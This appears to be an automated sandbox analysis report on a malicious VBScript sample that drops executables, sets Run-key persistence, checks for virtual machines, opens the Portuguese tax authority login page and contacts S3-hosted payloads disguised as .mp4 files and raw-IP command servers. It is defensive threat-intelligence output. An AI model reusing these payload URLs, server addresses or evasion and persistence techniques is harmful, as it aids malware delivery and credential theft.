Source: C:\Windows\System32\wscript.exe Section loaded: version.dll, kernel.appcore.dll, uxtheme.dll, sxs.dll, vbscript.dll, amsi.dll, userenv.dll, profapi.dll, wldp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, msisip.dll, wshext.dll, scrobj.dll, scrrun.dll, mpr.dll, windows.storage.dll, propsys.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.shell.servicehostbuilder.dll, onecoreuapcommonproxystub.dll, ieframe.dll, netapi32.dll, winhttp.dll, wkscli.dll, windows.staterepositoryps.dll, edputil.dll, secur32.dll, sspicli.dll, mlang.dll, wininet.dll, policymanager.dll, msvcp110_win.dll, wintypes.dll, onecorecommonproxystub.dll, msxml3.dll, ondemandconnroutehelper.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, dpapi.dll, gpapi.dll, ncrypt.dll, ncryptsslp.dll, msdart.dll, apphelp.dll, zipfldr.dll, dui70.dll, duser.dll, chartv.dll, oleacc.dll, atlthunk.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, wtsapi32.dll, winsta.dll, textshaping.dll, windows.fileexplorer.common.dll, explorerframe.dll, shdocvw.dll, linkinfo.dll, ntshrui.dll, cscapi.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll
Source: C:\Users\Public\Termos\artigo.exe Section loaded: wininet.dll, version.dll, wtsapi32.dll, uxtheme.dll, kernel.appcore.dll, winsta.dll, textshaping.dll, windowscodecs.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, wintypes.dll, dwmapi.dll, iertutil.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, msasn1.dll, dpapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, gpapi.dll, ncrypt.dll, ncryptsslp.dll, apphelp.dll
Source: C:\Intrumental\place.exe Section loaded: wininet.dll, version.dll, wtsapi32.dll, uxtheme.dll, kernel.appcore.dll, winsta.dll, textshaping.dll, windowscodecs.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, wintypes.dll, dwmapi.dll
Source: C:\Intrumental\lspcv2.exe Section loaded: wininet.dll, version.dll, wtsapi32.dll, uxtheme.dll, kernel.appcore.dll, winsta.dll, textshaping.dll, windowscodecs.dll, wsock32.dll, mswsock.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, wintypes.dll, dwmapi.dll
Source: C:\Intrumental\lspcv2.exeSection loaded: wininet.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: version.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: winsta.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wldp.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: profapi.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: netutils.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: schannel.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\place.exeSection loaded: wininet.dllJump to behavior
Source: C:\Intrumental\place.exeSection loaded: version.dllJump to behavior
Source: C:\Intrumental\place.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Intrumental\place.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Intrumental\place.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Intrumental\place.exeSection loaded: winsta.dllJump to behavior
Source: C:\Intrumental\place.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Intrumental\place.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Intrumental\place.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Intrumental\place.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Intrumental\place.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Intrumental\place.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Intrumental\place.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Intrumental\place.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wininet.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: version.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: winsta.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wldp.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: profapi.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: netutils.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: schannel.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
Source: C:\Users\Public\Termos\artigo.exeWindow found: window name: TEditJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: guia_luqf.vbsStatic file information: File size 4092491 > 1048576
Source: artigo.exe.0.drStatic PE information: section name: .didata
Source: artigo.exe.0.drStatic PE information: section name: .debug
Source: place.exe.5.drStatic PE information: section name: .didata
Source: place.exe.5.drStatic PE information: section name: .debug
Source: lspcv2.exe.5.drStatic PE information: section name: .didata
Source: lspcv2.exe.5.drStatic PE information: section name: .debug
Source: alphaville[1].mp4.5.drStatic PE information: section name: .didata
Source: alphaville[1].mp4.5.drStatic PE information: section name: .debug
Source: basketchampion[1].mp4.5.drStatic PE information: section name: .didata
Source: basketchampion[1].mp4.5.drStatic PE information: section name: .debug
Source: C:\Intrumental\lspcv2.exeCode function: 11_2_0000002D79CFE9FC pushad ; retf 11_2_0000002D79CFEA39
Source: C:\Intrumental\lspcv2.exeCode function: 11_2_0000002D79CFEA05 pushad ; retf 11_2_0000002D79CFEA39
Source: C:\Intrumental\lspcv2.exeCode function: 11_2_0000002D79CFBDA8 push ecx; retf 11_2_0000002D79CFBDA9
Source: C:\Intrumental\lspcv2.exeCode function: 11_2_0000002D79CFE9B4 pushad ; retf 11_2_0000002D79CFEA39
Source: C:\Intrumental\lspcv2.exeCode function: 11_2_0000002D79CFAD18 push ecx; retf 11_2_0000002D79CFAD19
Source: C:\Users\Public\Termos\artigo.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\alphaville[1].mp4Jump to dropped file
Source: C:\Users\Public\Termos\artigo.exeFile created: C:\Intrumental\lspcv2.exeJump to dropped file
Source: C:\Users\Public\Termos\artigo.exeFile created: C:\Intrumental\place.exeJump to dropped file
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\Public\Termos\artigo.exeJump to dropped file
Source: C:\Users\Public\Termos\artigo.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\basketchampion[1].mp4Jump to dropped file

Boot Survival

Source: C:\Intrumental\lspcv2.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LSPJump to behavior
Source: C:\Intrumental\place.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run IplaceJump to behavior

Hooking and other Techniques for Hiding and Protection

Source: artigo.exe, 00000005.00000003.2082555406.0000020EFAC78000.00000004.00000020.00020000.00000000.sdmp, artigo.exe, 00000005.00000002.2976258249.0000020EFAC7F000.00000004.00000020.00020000.00000000.sdmp, place.exe, 00000008.00000000.2053768694.00000000006D1000.00000020.00000001.01000000.0000000D.sdmp, lspcv2.exe, 00000009.00000000.2126202000.0000000001E9E000.00000002.00000001.01000000.0000000E.sdmp, lspcv2.exe, 00000009.00000000.2116894129.00000000001DB000.00000020.00000001.01000000.0000000E.sdmpBinary or memory string: torConnect
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\Termos\artigo.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Intrumental\place.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Intrumental\lspcv2.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Intrumental\lspcv2.exeCode function: 11_2_0000002D79CFBB30 sldt word ptr [eax]11_2_0000002D79CFBB30
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Intrumental\lspcv2.exeWindow / User API: threadDelayed 1531Jump to behavior
Source: C:\Intrumental\lspcv2.exeWindow / User API: threadDelayed 906Jump to behavior
Source: C:\Intrumental\lspcv2.exeWindow / User API: threadDelayed 417Jump to behavior
Source: C:\Users\Public\Termos\artigo.exe TID: 8048Thread sleep time: -34007s >= -30000sJump to behavior
Source: C:\Intrumental\lspcv2.exe TID: 7520Thread sleep count: 1531 > 30Jump to behavior
Source: C:\Intrumental\lspcv2.exe TID: 7520Thread sleep time: -44399000s >= -30000sJump to behavior
Source: C:\Intrumental\lspcv2.exe TID: 7516Thread sleep time: -90000s >= -30000sJump to behavior
Source: C:\Intrumental\lspcv2.exe TID: 1608Thread sleep count: 906 > 30Jump to behavior
Source: C:\Intrumental\lspcv2.exe TID: 1608Thread sleep time: -26274000s >= -30000sJump to behavior
Source: C:\Intrumental\lspcv2.exe TID: 6036Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Intrumental\lspcv2.exe TID: 6036Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Intrumental\lspcv2.exe TID: 6296Thread sleep count: 417 > 30Jump to behavior
Source: C:\Intrumental\lspcv2.exe TID: 6296Thread sleep time: -12093000s >= -30000sJump to behavior
Source: C:\Intrumental\lspcv2.exe TID: 6228Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\Public\Termos\artigo.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\00000809Jump to behavior
Source: C:\Intrumental\place.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\00000809Jump to behavior
Source: C:\Intrumental\lspcv2.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\00000809Jump to behavior
Source: C:\Intrumental\lspcv2.exeLast function: Thread delayed
Source: C:\Windows\System32\wscript.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\Public\Termos\artigo.exeThread delayed: delay time: 34007Jump to behavior
Source: C:\Intrumental\lspcv2.exeThread delayed: delay time: 30000Jump to behavior
Source: artigo.exe, 00000005.00000002.2976258249.0000020EFAC75000.00000004.00000020.00020000.00000000.sdmp, artigo.exe, 00000005.00000003.2083615098.0000020EFAC70000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000003.1824828942.000002232AA58000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f56
Source: wscript.exe, 00000000.00000003.1803335136.0000022321AF6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
Source: artigo.exe, 00000005.00000002.2970291807.0000020EFABE5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`c
Source: wscript.exe, 00000000.00000003.1803335136.0000022321AF6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWq'\
Source: lspcv2.exe, 00000009.00000002.2978645884.00000145E2F34000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\wscript.exeFile created: artigo.exe.0.drJump to dropped file
Source: C:\Windows\System32\wscript.exeNetwork Connect: 16.12.9.14 443Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboardJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\Public\Termos\artigo.exe "C:\users\public\Termos\artigo.exe" Jump to behavior
Source: place.exe, 00000008.00000002.2972396912.000001477F55C000.00000004.00001000.00020000.00000000.sdmp, place.exe, 00000008.00000002.2972396912.000001477F554000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Program Manager
Source: artigo.exe, 00000005.00000000.1877254382.0000000001C94000.00000002.00000001.01000000.0000000B.sdmp, place.exe, 00000008.00000000.2060052919.00000000015E3000.00000002.00000001.01000000.0000000D.sdmp, lspcv2.exe, 00000009.00000000.2126202000.000000000149E000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: _ZN6Winapi7Windows11DOF_PROGMANE
Source: place.exe, 00000008.00000002.2972396912.000001477F55C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Program Managerq
Source: place.exe, 00000008.00000002.2972396912.000001477F55C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: program manager
Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\Public\Termos.zip VolumeInformationJump to behavior
Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: lspcv2.exe, 00000009.00000000.2126202000.0000000001E9E000.00000002.00000001.01000000.0000000E.sdmp | Binary or memory string: %_ZN23Overbyteicscharsetutils7WIN_874E
Source: lspcv2.exe, 00000009.00000000.2116894129.00000000001DB000.00000020.00000001.01000000.0000000E.sdmp | Binary or memory string: WIN_874
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| Gather Victim Identity Information | Scripting (21) | Valid Accounts | Exploitation for Client Execution (1) | Scripting (21) | Process Injection (112) | Masquerading (11) | OS Credential Dumping | Security Software Discovery (1) | Remote Services | Data from Local System | Encrypted Channel (1) | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | Scheduled Task/Job | Registry Run Keys / Startup Folder (11) | Registry Run Keys / Startup Folder (11) | Virtualization/Sandbox Evasion (21) | LSASS Memory | Process Discovery (1) | Remote Desktop Protocol | Data from Removable Media | Ingress Tool Transfer (3) | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | DLL Side-Loading (1) | DLL Side-Loading (1) | Process Injection (112) | Security Account Manager | Virtualization/Sandbox Evasion (21) | SMB/Windows Admin Shares | Data from Network Shared Drive | Multi-hop Proxy (1) | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Obfuscated Files or Information (2) | NTDS | Application Window Discovery (1) | Distributed Component Object Model | Input Capture | Non-Application Layer Protocol (3) | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | DLL Side-Loading (1) | LSA Secrets | File and Directory Discovery (1) | SSH | Keylogging | Application Layer Protocol (4) | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | System Information Discovery (23) | VNC | GUI Input Capture | Proxy (1) | Data Transfer Size Limits | Service Stop |
[Figure: Behavior Graph ID: 1555843, Sample: guia_luqf.vbs, Startdate: 14/11/2024, Architecture: WINDOWS, Score: 88]

No Antivirus matches
| Source | Detection | Scanner | Label | Link |
| --- | --- | --- | --- | --- |
| C:\Intrumental\lspcv2.exe | 5% | ReversingLabs | | |
| C:\Intrumental\place.exe | 17% | ReversingLabs | | |
| C:\Users\Public\Termos\artigo.exe | 5% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\alphaville[1].mp4 | 17% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\basketchampion[1].mp4 | 5% | ReversingLabs | | |
No Antivirus matches
No Antivirus matches
| Source | Detection | Scanner | Label | Link |
| --- | --- | --- | --- | --- |
| https://happychristmaslegado.s3.eu-north-1.amazonaws.com/alphaville.mp4B | 0% | Avira URL Cloud | safe | |
| https://happychristmaslegado.s3.eu-north-1.amazonaws.com/basketchampion.mp4 | 0% | Avira URL Cloud | safe | |
| https://privacidadeepreferenciapt.s3.eu-north-1.amazonaws.com/preferencia.cdr | 0% | Avira URL Cloud | safe | |
| https://happychristmaslegado.s3.eu-north-1.amazonaws.com/alphaville.mp43 | 0% | Avira URL Cloud | safe | |
| https://happychristmaslegado.s3.eu-north-1.amazonaws.com/basketchampion.mp4% | 0% | Avira URL Cloud | safe | |
| http://94.241.141.101/dm4/publi.php | 0% | Avira URL Cloud | safe | |
| http://94.241.141.101/dm4/publi.php03 | 0% | Avira URL Cloud | safe | |
| https://happychristmaslegado.s3.eu-north-1.amazonaws.com/basketchampion.mp401 | 0% | Avira URL Cloud | safe | |
| https://happychristmaslegado.s3.eu-north-1.amazonaws.com/ | 0% | Avira URL Cloud | safe | |
| https://happychristmaslegado.s3.eu-north-1.amazonaws.com/alphaville.mp4C | 0% | Avira URL Cloud | safe | |
| https://happychristmaslegado.s3.eu-north-1.amazonaws.com/basketchampion.mp4Y | 0% | Avira URL Cloud | safe | |
| https://privacidadeepreferenciapt.s3.eu-north-1.amazonaws.com/prefere | 0% | Avira URL Cloud | safe | |
| http://185.178.46.42/vo/U | 0% | Avira URL Cloud | safe | |
| https://happychristmaslegado.s3.eu-north-1.amazonaws.com/basketchampion.mp4bif | 0% | Avira URL Cloud | safe | |
| https://happychristmaslegado.s3.eu-north-1.amazonaws.com/alphaville.mp4 | 0% | Avira URL Cloud | safe | |
| https://privacidadeepreferenciapt.s3.eu-north-1.amazonaws.com/preferencia.cdrIVE=C | 0% | Avira URL Cloud | safe | |
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
| --- | --- | --- | --- | --- | --- |
| www.portaldasfinancas.gov.pt | 62.28.254.212 | true | false | | high |
| s3.timeweb.com | 92.53.116.138 | true | false | | high |
| s3-r-w.eu-north-1.amazonaws.com | 16.12.9.14 | true | false | | high |
| sni1gl.wpc.rhocdn.net | 152.199.21.175 | true | false | | high |
| www.google.com | 142.250.185.196 | true | false | | high |
| www.acesso.gov.pt | 62.28.254.215 | true | false | | high |
| static.portaldasfinancas.gov.pt | unknown | unknown | false | | high |
| happychristmaslegado.s3.eu-north-1.amazonaws.com | unknown | unknown | false | | unknown |
| privacidadeepreferenciapt.s3.eu-north-1.amazonaws.com | unknown | unknown | false | | unknown |
| Name | Malicious | Antivirus Detection | Reputation |
| --- | --- | --- | --- |
| https://www.acesso.gov.pt/autentica_static/js/smartresize.js?cb=5.2.10 | false | | high |
| https://happychristmaslegado.s3.eu-north-1.amazonaws.com/basketchampion.mp4 | true | Avira URL Cloud: safe | unknown |
| https://www.acesso.gov.pt/autentica_static/img/autenticacaogov.png | false | | high |
| https://www.acesso.gov.pt/autentica_static/icons/favicon.ico | false | | high |
| https://s3.timeweb.com/41907bc4-chronocromdocrom/integra/conf.txt | false | | high |
| https://privacidadeepreferenciapt.s3.eu-north-1.amazonaws.com/preferencia.cdr | true | Avira URL Cloud: safe | unknown |
| https://www.acesso.gov.pt/autentica_static/js/jquery/jquery.uniform.min.js?cb=5.2.10 | false | | high |
| https://www.acesso.gov.pt/autentica_static/js/capslock-login.js?cb=5.2.10 | false | | high |
| https://www.acesso.gov.pt/autentica_static/css/tabs.css?cb=5.2.10 | false | | high |
| https://www.acesso.gov.pt/autentica_static/pf/css/pf-main.css?cb=5.2.10 | false | | high |
| https://www.acesso.gov.pt/autentica_static/css/bootstrap.min.css?cb=5.2.10 | false | | high |
| https://www.acesso.gov.pt/autentica_static/css/styles.css?cb=5.2.10 | false | | high |
| https://www.acesso.gov.pt/autentica_static/js/bootstrap/bootstrap-3.3.4.min.js?cb=5.2.10 | false | | high |
| https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboard | false | | high |
| https://happychristmaslegado.s3.eu-north-1.amazonaws.com/alphaville.mp4 | true | Avira URL Cloud: safe | unknown |
| https://www.acesso.gov.pt/autentica_static/js/jquery/jquery-1.11.1.min.js?cb=5.2.10 | false | | high |
| https://static.portaldasfinancas.gov.pt/app/pfstatic_static/js/pf-footer.js | false | | high |
| https://www.portaldasfinancas.gov.pt/at/html//autentica_static/logos/logotipo_AT.png | false | | high |
| https://www.acesso.gov.pt/autentica_static/js/jquery/jquery.validate.min.js?cb=5.2.10 | false | | high |
| https://www.acesso.gov.pt/autentica_static/js/footer/footer.js?cb=5.2.10 | false | | high |
| https://www.acesso.gov.pt/autentica_static/js/modernizr.js?cb=5.2.10 | false | | high |
| https://www.acesso.gov.pt/autentica_static/img/background.png | false | | high |
| https://www.acesso.gov.pt/autentica_static/img/logo-at.png | false | | high |
| https://www.acesso.gov.pt/autentica_static/img/iconGovPt_20x20.png | false | | high |
| https://www.acesso.gov.pt/autentica_static/js/app.js?cb=5.2.10 | false | | high |
| https://www.acesso.gov.pt/autentica_static/css/sa-custom.css?cb=5.2.10 | false | | high |
| https://www.acesso.gov.pt/autentica_static/pf/css/footer.css?cb=5.2.10 | false | | high |
| Name | Source | Malicious | Antivirus Detection | Reputation |
| --- | --- | --- | --- | --- |
| http://94.241.141.101/dm4/publi.php03 | lspcv2.exe, 00000009.00000002.2982463608.00000145E4A03000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://94.241.141.101/dm4/ | lspcv2.exe, 00000009.00000002.2982463608.00000145E4A0A000.00000004.00001000.00020000.00000000.sdmp | false | | high |
| https://happychristmaslegado.s3.eu-north-1.amazonaws.com/alphaville.mp43 | artigo.exe, 00000005.00000002.2970291807.0000020EFABE5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://heapanalytics.com/js/ved.js | wscript.exe, 00000000.00000003.1681815966.000002232440C000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| https://happychristmaslegado.s3.eu-north-1.amazonaws.com/basketchampion.mp4% | artigo.exe, 00000005.00000002.2970291807.0000020EFABE5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
